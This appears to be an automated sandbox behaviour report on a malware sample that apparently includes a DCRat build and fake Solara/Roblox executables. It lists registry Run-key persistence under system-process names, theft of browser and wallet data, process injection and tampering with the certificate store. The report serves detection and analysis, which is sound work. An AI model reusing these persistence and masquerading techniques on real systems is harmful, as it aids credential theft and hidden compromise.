.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\nkeb0e.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2620 set thread context of 2228 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\817c8c8ec737a7 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Common Files\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\6203df4a6bafc7 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Common Files\DESIGNER\lsass.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Common Files\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\f76f1ed.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\DigitalLocker\it-IT\lsm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\DigitalLocker\it-IT\101b941d020240 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\f76f1ed.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AppPatch\ja-JP\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\twain_32\0a1fd5f707cd16 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIFA4C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFC22.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\AppPatch\ja-JP\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\twain_32\sppsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Registration\CRMLog\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\twain_32\sppsvc.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File opened for modification C:\Windows\Installer\MSIFBA5.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Registration\CRMLog\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\AppPatch\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Windows\twain_32\sppsvc.exe N/A
